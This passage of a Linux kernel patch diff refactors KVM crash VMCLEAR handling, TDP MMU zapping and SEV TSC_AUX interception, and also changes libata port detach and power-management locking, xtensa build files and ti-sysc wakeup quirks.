+ };
+ 
+-/*
+- * This is used to VMCLEAR all VMCSs loaded on the
+- * processor. And when loading kvm_intel module, the
+- * callback function pointer will be assigned.
+- *
+- * protected by rcu.
+- */
+-crash_vmclear_fn __rcu *crash_vmclear_loaded_vmcss = NULL;
+-EXPORT_SYMBOL_GPL(crash_vmclear_loaded_vmcss);
+-
+-static inline void cpu_crash_vmclear_loaded_vmcss(void)
+-{
+-	crash_vmclear_fn *do_vmclear_operation = NULL;
+-
+-	rcu_read_lock();
+-	do_vmclear_operation = rcu_dereference(crash_vmclear_loaded_vmcss);
+-	if (do_vmclear_operation)
+-		do_vmclear_operation();
+-	rcu_read_unlock();
+-}
+-
+ #if defined(CONFIG_SMP) && defined(CONFIG_X86_LOCAL_APIC)
+ 
+ static void kdump_nmi_callback(int cpu, struct pt_regs *regs)
+ {
+ 	crash_save_cpu(regs, cpu);
+ 
+-	/*
+-	 * VMCLEAR VMCSs loaded on all cpus if needed.
+-	 */
+-	cpu_crash_vmclear_loaded_vmcss();
+-
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+ 	 */
+@@ -133,11 +107,6 @@ void native_machine_crash_shutdown(struct pt_regs *regs)
+ 
+ 	crash_smp_send_stop();
+ 
+-	/*
+-	 * VMCLEAR VMCSs loaded on this cpu if needed.
+-	 */
+-	cpu_crash_vmclear_loaded_vmcss();
+-
+ 	cpu_emergency_disable_virtualization();
+ 
+ 	/*
+diff --git a/arch/x86/kernel/reboot.c b/arch/x86/kernel/reboot.c
+index d03c551defccf..299b970e5f829 100644
+--- a/arch/x86/kernel/reboot.c
++++ b/arch/x86/kernel/reboot.c
+@@ -787,6 +787,26 @@ void machine_crash_shutdown(struct pt_regs *regs)
+ }
+ #endif
+ 
++/*
++ * This is used to VMCLEAR all VMCSs loaded on the
++ * processor. And when loading kvm_intel module, the
++ * callback function pointer will be assigned.
++ *
++ * protected by rcu.
++ */
++crash_vmclear_fn __rcu *crash_vmclear_loaded_vmcss;
++EXPORT_SYMBOL_GPL(crash_vmclear_loaded_vmcss);
++
++static inline void cpu_crash_vmclear_loaded_vmcss(void)
++{
++	crash_vmclear_fn *do_vmclear_operation = NULL;
++
++	rcu_read_lock();
++	do_vmclear_operation = rcu_dereference(crash_vmclear_loaded_vmcss);
++	if (do_vmclear_operation)
++		do_vmclear_operation();
++	rcu_read_unlock();
++}
+ 
+ /* This is the CPU performing the emergency shutdown work. */
+ int crashing_cpu = -1;
+@@ -798,6 +818,8 @@ int crashing_cpu = -1;
+  */
+ void cpu_emergency_disable_virtualization(void)
+ {
++	cpu_crash_vmclear_loaded_vmcss();
++
+ 	cpu_emergency_vmxoff();
+ 	cpu_emergency_svm_disable();
+ }
+diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c
+index 892609cde4a20..804a252382da7 100644
+--- a/arch/x86/kernel/setup.c
++++ b/arch/x86/kernel/setup.c
+@@ -363,15 +363,11 @@ static void __init add_early_ima_buffer(u64 phys_addr)
+ #if defined(CONFIG_HAVE_IMA_KEXEC) && !defined(CONFIG_OF_FLATTREE)
+ int __init ima_free_kexec_buffer(void)
+ {
+-	int rc;
+-
+ 	if (!ima_kexec_buffer_size)
+ 		return -ENOENT;
+ 
+-	rc = memblock_phys_free(ima_kexec_buffer_phys,
+-				ima_kexec_buffer_size);
+-	if (rc)
+-		return rc;
++	memblock_free_late(ima_kexec_buffer_phys,
++			   ima_kexec_buffer_size);
+ 
+ 	ima_kexec_buffer_phys = 0;
+ 	ima_kexec_buffer_size = 0;
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index 7a6df4b62c1bd..2a6fec4e2d196 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -6079,7 +6079,6 @@ static bool kvm_rmap_zap_gfn_range(struct kvm *kvm, gfn_t gfn_start, gfn_t gfn_e
+ void kvm_zap_gfn_range(struct kvm *kvm, gfn_t gfn_start, gfn_t gfn_end)
+ {
+ 	bool flush;
+-	int i;
+ 
+ 	if (WARN_ON_ONCE(gfn_end <= gfn_start))
+ 		return;
+@@ -6090,11 +6089,8 @@ void kvm_zap_gfn_range(struct kvm *kvm, gfn_t gfn_start, gfn_t gfn_end)
+ 
+ 	flush = kvm_rmap_zap_gfn_range(kvm, gfn_start, gfn_end);
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
+-		for (i = 0; i < KVM_ADDRESS_SPACE_NUM; i++)
+-			flush = kvm_tdp_mmu_zap_leafs(kvm, i, gfn_start,
+-						      gfn_end, true, flush);
+-	}
++	if (is_tdp_mmu_enabled(kvm))
++		flush = kvm_tdp_mmu_zap_leafs(kvm, gfn_start, gfn_end, flush);
+ 
+ 	if (flush)
+ 		kvm_flush_remote_tlbs_with_address(kvm, gfn_start,
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
+index 70945f00ec412..9b9fc4e834d09 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.c
++++ b/arch/x86/kvm/mmu/tdp_mmu.c
+@@ -222,8 +222,12 @@ static struct kvm_mmu_page *tdp_mmu_next_root(struct kvm *kvm,
+ #define for_each_valid_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, _shared)	\
+ 	__for_each_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, _shared, true)
+ 
+-#define for_each_tdp_mmu_root_yield_safe(_kvm, _root, _as_id)			\
+-	__for_each_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, false, false)
++#define for_each_tdp_mmu_root_yield_safe(_kvm, _root)			\
++	for (_root = tdp_mmu_next_root(_kvm, NULL, false, false);		\
++	     _root;								\
++	     _root = tdp_mmu_next_root(_kvm, _root, false, false))		\
++		if (!kvm_lockdep_assert_mmu_lock_held(_kvm, false)) {		\
++		} else
+ 
+ /*
+  * Iterate over all TDP MMU roots.  Requires that mmu_lock be held for write,
+@@ -955,13 +959,12 @@ static bool tdp_mmu_zap_leafs(struct kvm *kvm, struct kvm_mmu_page *root,
+  * true if a TLB flush is needed before releasing the MMU lock, i.e. if one or
+  * more SPTEs were zapped since the MMU lock was last acquired.
+  */
+-bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, int as_id, gfn_t start, gfn_t end,
+-			   bool can_yield, bool flush)
++bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, gfn_t start, gfn_t end, bool flush)
+ {
+ 	struct kvm_mmu_page *root;
+ 
+-	for_each_tdp_mmu_root_yield_safe(kvm, root, as_id)
+-		flush = tdp_mmu_zap_leafs(kvm, root, start, end, can_yield, flush);
++	for_each_tdp_mmu_root_yield_safe(kvm, root)
++		flush = tdp_mmu_zap_leafs(kvm, root, start, end, true, flush);
+ 
+ 	return flush;
+ }
+@@ -969,7 +972,6 @@ bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, int as_id, gfn_t start, gfn_t end,
+ void kvm_tdp_mmu_zap_all(struct kvm *kvm)
+ {
+ 	struct kvm_mmu_page *root;
+-	int i;
+ 
+ 	/*
+ 	 * Zap all roots, including invalid roots, as all SPTEs must be dropped
+@@ -983,10 +985,8 @@ void kvm_tdp_mmu_zap_all(struct kvm *kvm)
+ 	 * is being destroyed or the userspace VMM has exited.  In both cases,
+ 	 * KVM_RUN is unreachable, i.e. no vCPUs will ever service the request.
+ 	 */
+-	for (i = 0; i < KVM_ADDRESS_SPACE_NUM; i++) {
+-		for_each_tdp_mmu_root_yield_safe(kvm, root, i)
+-			tdp_mmu_zap_root(kvm, root, false);
+-	}
++	for_each_tdp_mmu_root_yield_safe(kvm, root)
++		tdp_mmu_zap_root(kvm, root, false);
+ }
+ 
+ /*
+@@ -1221,8 +1221,13 @@ int kvm_tdp_mmu_map(struct kvm_vcpu *vcpu, struct kvm_page_fault *fault)
+ bool kvm_tdp_mmu_unmap_gfn_range(struct kvm *kvm, struct kvm_gfn_range *range,
+ 				 bool flush)
+ {
+-	return kvm_tdp_mmu_zap_leafs(kvm, range->slot->as_id, range->start,
+-				     range->end, range->may_block, flush);
++	struct kvm_mmu_page *root;
++
++	__for_each_tdp_mmu_root_yield_safe(kvm, root, range->slot->as_id, false, false)
++		flush = tdp_mmu_zap_leafs(kvm, root, range->start, range->end,
++					  range->may_block, flush);
++
++	return flush;
+ }
+ 
+ typedef bool (*tdp_handler_t)(struct kvm *kvm, struct tdp_iter *iter,
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.h b/arch/x86/kvm/mmu/tdp_mmu.h
+index c163f7cc23ca5..d0a9fe0770fdd 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.h
++++ b/arch/x86/kvm/mmu/tdp_mmu.h
+@@ -15,8 +15,7 @@ __must_check static inline bool kvm_tdp_mmu_get_root(struct kvm_mmu_page *root)
+ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 			  bool shared);
+ 
+-bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, int as_id, gfn_t start,
+-				 gfn_t end, bool can_yield, bool flush);
++bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, gfn_t start, gfn_t end, bool flush);
+ bool kvm_tdp_mmu_zap_sp(struct kvm *kvm, struct kvm_mmu_page *sp);
+ void kvm_tdp_mmu_zap_all(struct kvm *kvm);
+ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm);
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index d08d5e085649f..3060fe4e9731a 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -2941,6 +2941,32 @@ int sev_es_string_io(struct vcpu_svm *svm, int size, unsigned int port, int in)
+ 				    count, in);
+ }
+ 
++static void sev_es_vcpu_after_set_cpuid(struct vcpu_svm *svm)
++{
++	struct kvm_vcpu *vcpu = &svm->vcpu;
++
++	if (boot_cpu_has(X86_FEATURE_V_TSC_AUX)) {
++		bool v_tsc_aux = guest_cpuid_has(vcpu, X86_FEATURE_RDTSCP) ||
++				 guest_cpuid_has(vcpu, X86_FEATURE_RDPID);
++
++		set_msr_interception(vcpu, svm->msrpm, MSR_TSC_AUX, v_tsc_aux, v_tsc_aux);
++	}
++}
++
++void sev_vcpu_after_set_cpuid(struct vcpu_svm *svm)
++{
++	struct kvm_vcpu *vcpu = &svm->vcpu;
++	struct kvm_cpuid_entry2 *best;
++
++	/* For sev guests, the memory encryption bit is not reserved in CR3.  */
++	best = kvm_find_cpuid_entry(vcpu, 0x8000001F);
++	if (best)
++		vcpu->arch.reserved_gpa_bits &= ~(1UL << (best->ebx & 0x3f));
++
++	if (sev_es_guest(svm->vcpu.kvm))
++		sev_es_vcpu_after_set_cpuid(svm);
++}
++
+ static void sev_es_init_vmcb(struct vcpu_svm *svm)
+ {
+ 	struct kvm_vcpu *vcpu = &svm->vcpu;
+@@ -2987,14 +3013,6 @@ static void sev_es_init_vmcb(struct vcpu_svm *svm)
+ 	set_msr_interception(vcpu, svm->msrpm, MSR_IA32_LASTBRANCHTOIP, 1, 1);
+ 	set_msr_interception(vcpu, svm->msrpm, MSR_IA32_LASTINTFROMIP, 1, 1);
+ 	set_msr_interception(vcpu, svm->msrpm, MSR_IA32_LASTINTTOIP, 1, 1);
+-
+-	if (boot_cpu_has(X86_FEATURE_V_TSC_AUX) &&
+-	    (guest_cpuid_has(&svm->vcpu, X86_FEATURE_RDTSCP) ||
+-	     guest_cpuid_has(&svm->vcpu, X86_FEATURE_RDPID))) {
+-		set_msr_interception(vcpu, svm->msrpm, MSR_TSC_AUX, 1, 1);
+-		if (guest_cpuid_has(&svm->vcpu, X86_FEATURE_RDTSCP))
+-			svm_clr_intercept(svm, INTERCEPT_RDTSCP);
+-	}
+ }
+ 
+ void sev_init_vmcb(struct vcpu_svm *svm)
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 7e4d66be18ef5..c871a6d6364ca 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -4173,7 +4173,6 @@ static bool svm_has_emulated_msr(struct kvm *kvm, u32 index)
+ static void svm_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+-	struct kvm_cpuid_entry2 *best;
+ 
+ 	vcpu->arch.xsaves_enabled = guest_cpuid_has(vcpu, X86_FEATURE_XSAVE) &&
+ 				    boot_cpu_has(X86_FEATURE_XSAVE) &&
+@@ -4198,12 +4197,8 @@ static void svm_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ 
+ 	svm_recalc_instruction_intercepts(vcpu, svm);
+ 
+-	/* For sev guests, the memory encryption bit is not reserved in CR3.  */
+-	if (sev_guest(vcpu->kvm)) {
+-		best = kvm_find_cpuid_entry(vcpu, 0x8000001F);
+-		if (best)
+-			vcpu->arch.reserved_gpa_bits &= ~(1UL << (best->ebx & 0x3f));
+-	}
++	if (sev_guest(vcpu->kvm))
++		sev_vcpu_after_set_cpuid(svm);
+ 
+ 	init_vmcb_after_set_cpuid(vcpu);
+ }
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index 62f87492763e0..4cb1425900c6d 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -677,6 +677,7 @@ void __init sev_hardware_setup(void);
+ void sev_hardware_unsetup(void);
+ int sev_cpu_init(struct svm_cpu_data *sd);
+ void sev_init_vmcb(struct vcpu_svm *svm);
++void sev_vcpu_after_set_cpuid(struct vcpu_svm *svm);
+ void sev_free_vcpu(struct kvm_vcpu *vcpu);
+ int sev_handle_vmgexit(struct kvm_vcpu *vcpu);
+ int sev_es_string_io(struct vcpu_svm *svm, int size, unsigned int port, int in);
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 4e972b9b68e59..31a10d774df6d 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -40,7 +40,7 @@
+ #include <asm/idtentry.h>
+ #include <asm/io.h>
+ #include <asm/irq_remapping.h>
+-#include <asm/kexec.h>
++#include <asm/reboot.h>
+ #include <asm/perf_event.h>
+ #include <asm/mmu_context.h>
+ #include <asm/mshyperv.h>
+@@ -702,7 +702,6 @@ static int vmx_set_guest_uret_msr(struct vcpu_vmx *vmx,
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_KEXEC_CORE
+ static void crash_vmclear_local_loaded_vmcss(void)
+ {
+ 	int cpu = raw_smp_processor_id();
+@@ -712,7 +711,6 @@ static void crash_vmclear_local_loaded_vmcss(void)
+ 			    loaded_vmcss_on_cpu_link)
+ 		vmcs_clear(v->vmcs);
+ }
+-#endif /* CONFIG_KEXEC_CORE */
+ 
+ static void __loaded_vmcs_clear(void *arg)
+ {
+@@ -8522,10 +8520,9 @@ static void __vmx_exit(void)
+ {
+ 	allow_smaller_maxphyaddr = false;
+ 
+-#ifdef CONFIG_KEXEC_CORE
+ 	RCU_INIT_POINTER(crash_vmclear_loaded_vmcss, NULL);
+ 	synchronize_rcu();
+-#endif
++
+ 	vmx_cleanup_l1d_flush();
+ }
+ 
+@@ -8598,10 +8595,9 @@ static int __init vmx_init(void)
+ 		pi_init_cpu(cpu);
+ 	}
+ 
+-#ifdef CONFIG_KEXEC_CORE
+ 	rcu_assign_pointer(crash_vmclear_loaded_vmcss,
+ 			   crash_vmclear_local_loaded_vmcss);
+-#endif
++
+ 	vmx_check_vmcs12_offsets();
+ 
+ 	/*
+diff --git a/arch/xtensa/boot/Makefile b/arch/xtensa/boot/Makefile
+index a65b7a9ebff28..d8b0fadf429a9 100644
+--- a/arch/xtensa/boot/Makefile
++++ b/arch/xtensa/boot/Makefile
+@@ -9,8 +9,7 @@
+ 
+ 
+ # KBUILD_CFLAGS used when building rest of boot (takes effect recursively)
+-KBUILD_CFLAGS	+= -fno-builtin -Iarch/$(ARCH)/boot/include
+-HOSTFLAGS	+= -Iarch/$(ARCH)/boot/include
++KBUILD_CFLAGS	+= -fno-builtin
+ 
+ subdir-y	:= lib
+ targets		+= vmlinux.bin vmlinux.bin.gz
+diff --git a/arch/xtensa/boot/lib/zmem.c b/arch/xtensa/boot/lib/zmem.c
+index e3ecd743c5153..b89189355122a 100644
+--- a/arch/xtensa/boot/lib/zmem.c
++++ b/arch/xtensa/boot/lib/zmem.c
+@@ -4,13 +4,14 @@
+ /* bits taken from ppc */
+ 
+ extern void *avail_ram, *end_avail;
++void gunzip(void *dst, int dstlen, unsigned char *src, int *lenp);
+ 
+-void exit (void)
++static void exit(void)
+ {
+   for (;;);
+ }
+ 
+-void *zalloc(unsigned size)
++static void *zalloc(unsigned int size)
+ {
+         void *p = avail_ram;
+ 
+diff --git a/arch/xtensa/include/asm/core.h b/arch/xtensa/include/asm/core.h
+index 7cef85ad9741a..25293269e1edd 100644
+--- a/arch/xtensa/include/asm/core.h
++++ b/arch/xtensa/include/asm/core.h
+@@ -6,6 +6,10 @@
+ 
+ #include <variant/core.h>
+ 
++#ifndef XCHAL_HAVE_DIV32
++#define XCHAL_HAVE_DIV32 0
++#endif
++
+ #ifndef XCHAL_HAVE_EXCLUSIVE
+ #define XCHAL_HAVE_EXCLUSIVE 0
+ #endif
+diff --git a/arch/xtensa/lib/umulsidi3.S b/arch/xtensa/lib/umulsidi3.S
+index 1360816479427..4d9ba2387de0f 100644
+--- a/arch/xtensa/lib/umulsidi3.S
++++ b/arch/xtensa/lib/umulsidi3.S
+@@ -3,7 +3,9 @@
+ #include <asm/asmmacro.h>
+ #include <asm/core.h>
+ 
+-#if !XCHAL_HAVE_MUL16 && !XCHAL_HAVE_MUL32 && !XCHAL_HAVE_MAC16
++#if XCHAL_HAVE_MUL16 || XCHAL_HAVE_MUL32 || XCHAL_HAVE_MAC16
++#define XCHAL_NO_MUL 0
++#else
+ #define XCHAL_NO_MUL 1
+ #endif
+ 
+diff --git a/arch/xtensa/platforms/iss/network.c b/arch/xtensa/platforms/iss/network.c
+index 119345eeb04c9..bea539f9039a2 100644
+--- a/arch/xtensa/platforms/iss/network.c
++++ b/arch/xtensa/platforms/iss/network.c
+@@ -201,7 +201,7 @@ static int tuntap_write(struct iss_net_private *lp, struct sk_buff **skb)
+ 	return simc_write(lp->tp.info.tuntap.fd, (*skb)->data, (*skb)->len);
+ }
+ 
+-unsigned short tuntap_protocol(struct sk_buff *skb)
++static unsigned short tuntap_protocol(struct sk_buff *skb)
+ {
+ 	return eth_type_trans(skb, skb->dev);
+ }
+@@ -441,7 +441,7 @@ static int iss_net_change_mtu(struct net_device *dev, int new_mtu)
+ 	return -EINVAL;
+ }
+ 
+-void iss_net_user_timer_expire(struct timer_list *unused)
++static void iss_net_user_timer_expire(struct timer_list *unused)
+ {
+ }
+ 
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 0ba0c3d1613f1..25b9bdf2fc380 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -4981,17 +4981,19 @@ static void ata_port_request_pm(struct ata_port *ap, pm_message_t mesg,
+ 	struct ata_link *link;
+ 	unsigned long flags;
+ 
+-	/* Previous resume operation might still be in
+-	 * progress.  Wait for PM_PENDING to clear.
++	spin_lock_irqsave(ap->lock, flags);
++
++	/*
++	 * A previous PM operation might still be in progress. Wait for
++	 * ATA_PFLAG_PM_PENDING to clear.
+ 	 */
+ 	if (ap->pflags & ATA_PFLAG_PM_PENDING) {
++		spin_unlock_irqrestore(ap->lock, flags);
+ 		ata_port_wait_eh(ap);
+-		WARN_ON(ap->pflags & ATA_PFLAG_PM_PENDING);
++		spin_lock_irqsave(ap->lock, flags);
+ 	}
+ 
+-	/* request PM ops to EH */
+-	spin_lock_irqsave(ap->lock, flags);
+-
++	/* Request PM operation to EH */
+ 	ap->pm_mesg = mesg;
+ 	ap->pflags |= ATA_PFLAG_PM_PENDING;
+ 	ata_for_each_link(link, ap, HOST_FIRST) {
+@@ -5003,10 +5005,8 @@ static void ata_port_request_pm(struct ata_port *ap, pm_message_t mesg,
+ 
+ 	spin_unlock_irqrestore(ap->lock, flags);
+ 
+-	if (!async) {
++	if (!async)
+ 		ata_port_wait_eh(ap);
+-		WARN_ON(ap->pflags & ATA_PFLAG_PM_PENDING);
+-	}
+ }
+ 
+ /*
+@@ -5173,7 +5173,7 @@ EXPORT_SYMBOL_GPL(ata_host_resume);
+ #endif
+ 
+ const struct device_type ata_port_type = {
+-	.name = "ata_port",
++	.name = ATA_PORT_TYPE_NAME,
+ #ifdef CONFIG_PM
+ 	.pm = &ata_port_pm_ops,
+ #endif
+@@ -5906,11 +5906,30 @@ static void ata_port_detach(struct ata_port *ap)
+ 	if (!ap->ops->error_handler)
+ 		goto skip_eh;
+ 
+-	/* tell EH we're leaving & flush EH */
++	/* Wait for any ongoing EH */
++	ata_port_wait_eh(ap);
++
++	mutex_lock(&ap->scsi_scan_mutex);
+ 	spin_lock_irqsave(ap->lock, flags);
++
++	/* Remove scsi devices */
++	ata_for_each_link(link, ap, HOST_FIRST) {
++		ata_for_each_dev(dev, link, ALL) {
++			if (dev->sdev) {
++				spin_unlock_irqrestore(ap->lock, flags);
++				scsi_remove_device(dev->sdev);
++				spin_lock_irqsave(ap->lock, flags);
++				dev->sdev = NULL;
++			}
++		}
++	}
++
++	/* Tell EH to disable all devices */
+ 	ap->pflags |= ATA_PFLAG_UNLOADING;
+ 	ata_port_schedule_eh(ap);
++
+ 	spin_unlock_irqrestore(ap->lock, flags);
++	mutex_unlock(&ap->scsi_scan_mutex);
+ 
+ 	/* wait till EH commits suicide */
+ 	ata_port_wait_eh(ap);
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index a3ae5fc2a42fc..6d4c80b6daaef 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -2704,18 +2704,11 @@ int ata_eh_reset(struct ata_link *link, int classify,
+ 		}
+ 	}
+ 
+-	/*
+-	 * Some controllers can't be frozen very well and may set spurious
+-	 * error conditions during reset.  Clear accumulated error
+-	 * information and re-thaw the port if frozen.  As reset is the
+-	 * final recovery action and we cross check link onlineness against
+-	 * device classification later, no hotplug event is lost by this.
+-	 */
++	/* clear cached SError */
+ 	spin_lock_irqsave(link->ap->lock, flags);
+-	memset(&link->eh_info, 0, sizeof(link->eh_info));
++	link->eh_info.serror = 0;
+ 	if (slave)
+-		memset(&slave->eh_info, 0, sizeof(link->eh_info));
+-	ap->pflags &= ~ATA_PFLAG_EH_PENDING;
++		slave->eh_info.serror = 0;
+ 	spin_unlock_irqrestore(link->ap->lock, flags);
+ 
+ 	if (ap->pflags & ATA_PFLAG_FROZEN)
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 9c0052d28078a..d28628b964e29 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1113,6 +1113,42 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 	return 0;
+ }
+ 
++/**
++ *	ata_scsi_slave_alloc - Early setup of SCSI device
++ *	@sdev: SCSI device to examine
++ *
++ *	This is called from scsi_alloc_sdev() when the scsi device
++ *	associated with an ATA device is scanned on a port.
++ *
++ *	LOCKING:
++ *	Defined by SCSI layer.  We don't really care.
++ */
++
++int ata_scsi_slave_alloc(struct scsi_device *sdev)
++{
++	struct ata_port *ap = ata_shost_to_port(sdev->host);
++	struct device_link *link;
++
++	ata_scsi_sdev_config(sdev);
++
++	/*
++	 * Create a link from the ata_port device to the scsi device to ensure
++	 * that PM does suspend/resume in the correct order: the scsi device is
++	 * consumer (child) and the ata port the supplier (parent).
++	 */
++	link = device_link_add(&sdev->sdev_gendev, &ap->tdev,
++			       DL_FLAG_STATELESS |
++			       DL_FLAG_PM_RUNTIME | DL_FLAG_RPM_ACTIVE);
++	if (!link) {
++		ata_port_err(ap, "Failed to create link to scsi device %s\n",
++			     dev_name(&sdev->sdev_gendev));
++		return -ENODEV;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(ata_scsi_slave_alloc);
++
+ /**
+  *	ata_scsi_slave_config - Set SCSI device attributes
+  *	@sdev: SCSI device to examine
+@@ -1129,14 +1165,11 @@ int ata_scsi_slave_config(struct scsi_device *sdev)
+ {
+ 	struct ata_port *ap = ata_shost_to_port(sdev->host);
+ 	struct ata_device *dev = __ata_scsi_find_dev(ap, sdev);
+-	int rc = 0;
+-
+-	ata_scsi_sdev_config(sdev);
+ 
+ 	if (dev)
+-		rc = ata_scsi_dev_config(sdev, dev);
++		return ata_scsi_dev_config(sdev, dev);
+ 
+-	return rc;
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(ata_scsi_slave_config);
+ 
+@@ -1163,6 +1196,8 @@ void ata_scsi_slave_destroy(struct scsi_device *sdev)
+ 	if (!ap->ops->error_handler)
+ 		return;
+ 
++	device_link_remove(&sdev->sdev_gendev, &ap->tdev);
++
+ 	spin_lock_irqsave(ap->lock, flags);
+ 	dev = __ata_scsi_find_dev(ap, sdev);
+ 	if (dev && dev->sdev) {
+@@ -4192,7 +4227,7 @@ void ata_scsi_simulate(struct ata_device *dev, struct scsi_cmnd *cmd)
+ 		break;
+ 
+ 	case MAINTENANCE_IN:
+-		if (scsicmd[1] == MI_REPORT_SUPPORTED_OPERATION_CODES)
++		if ((scsicmd[1] & 0x1f) == MI_REPORT_SUPPORTED_OPERATION_CODES)
+ 			ata_scsi_rbuf_fill(&args, ata_scsiop_maint_in);
+ 		else
+ 			ata_scsi_set_invalid_field(dev, cmd, 1, 0xff);
+diff --git a/drivers/ata/libata-transport.c b/drivers/ata/libata-transport.c
+index e4fb9d1b9b398..3e49a877500e1 100644
+--- a/drivers/ata/libata-transport.c
++++ b/drivers/ata/libata-transport.c
+@@ -266,6 +266,10 @@ void ata_tport_delete(struct ata_port *ap)
+ 	put_device(dev);
+ }
+ 
++static const struct device_type ata_port_sas_type = {
++	.name = ATA_PORT_TYPE_NAME,
++};
++
+ /** ata_tport_add - initialize a transport ATA port structure
+  *
+  * @parent:	parent device
+@@ -283,7 +287,10 @@ int ata_tport_add(struct device *parent,
+ 	struct device *dev = &ap->tdev;
+ 
+ 	device_initialize(dev);
+-	dev->type = &ata_port_type;
++	if (ap->flags & ATA_FLAG_SAS_HOST)
++		dev->type = &ata_port_sas_type;
++	else
++		dev->type = &ata_port_type;
+ 
+ 	dev->parent = parent;
+ 	ata_host_get(ap->host);
+diff --git a/drivers/ata/libata.h b/drivers/ata/libata.h
+index 2c5c8273af017..e5ec197aed303 100644
+--- a/drivers/ata/libata.h
++++ b/drivers/ata/libata.h
+@@ -30,6 +30,8 @@ enum {
+ 	ATA_DNXFER_QUIET	= (1 << 31),
+ };
+ 
++#define ATA_PORT_TYPE_NAME	"ata_port"
++
+ extern atomic_t ata_print_id;
+ extern int atapi_passthru16;
+ extern int libata_fua;
+diff --git a/drivers/ata/sata_mv.c b/drivers/ata/sata_mv.c
+index e3cff01201b80..17f9062b0eaa5 100644
+--- a/drivers/ata/sata_mv.c
++++ b/drivers/ata/sata_mv.c
+@@ -1255,8 +1255,8 @@ static void mv_dump_mem(struct device *dev, void __iomem *start, unsigned bytes)
+ 
+ 	for (b = 0; b < bytes; ) {
+ 		for (w = 0, o = 0; b < bytes && w < 4; w++) {
+-			o += snprintf(linebuf + o, sizeof(linebuf) - o,
+-				      "%08x ", readl(start + b));
++			o += scnprintf(linebuf + o, sizeof(linebuf) - o,
++				       "%08x ", readl(start + b));
+ 			b += sizeof(u32);
+ 		}
+ 		dev_dbg(dev, "%s: %p: %s\n",
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index ddde1427c90c7..59a2fe2448f17 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -38,6 +38,7 @@ enum sysc_soc {
+ 	SOC_2420,
+ 	SOC_2430,
+ 	SOC_3430,
++	SOC_AM35,
+ 	SOC_3630,
+ 	SOC_4430,
+ 	SOC_4460,
+@@ -1119,6 +1120,11 @@ static int sysc_enable_module(struct device *dev)
+ 	if (ddata->cfg.quirks & (SYSC_QUIRK_SWSUP_SIDLE |
+ 				 SYSC_QUIRK_SWSUP_SIDLE_ACT)) {
+ 		best_mode = SYSC_IDLE_NO;
++
++		/* Clear WAKEUP */
++		if (regbits->enwkup_shift >= 0 &&
++		    ddata->cfg.sysc_val & BIT(regbits->enwkup_shift))
++			reg &= ~BIT(regbits->enwkup_shift);
+ 	} else {
+ 		best_mode = fls(ddata->cfg.sidlemodes) - 1;
+ 		if (best_mode > SYSC_IDLE_MASK) {
+@@ -1246,6 +1252,13 @@ set_sidle:
+ 		}
+ 	}
+ 
++	if (ddata->cfg.quirks & SYSC_QUIRK_SWSUP_SIDLE_ACT) {
++		/* Set WAKEUP */
++		if (regbits->enwkup_shift >= 0 &&
++		    ddata->cfg.sysc_val & BIT(regbits->enwkup_shift))
++			reg |= BIT(regbits->enwkup_shift);
++	}
++
+ 	reg &= ~(SYSC_IDLE_MASK << regbits->sidle_shift);
+ 	reg |= best_mode << regbits->sidle_shift;
+ 	if (regbits->autoidle_shift >= 0 &&
+@@ -1540,16 +1553,16 @@ struct sysc_revision_quirk {
+ static const struct sysc_revision_quirk sysc_revision_quirks[] = {
+ 	/* These drivers need to be fixed to not use pm_runtime_irq_safe() */
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x00000046, 0xffffffff,
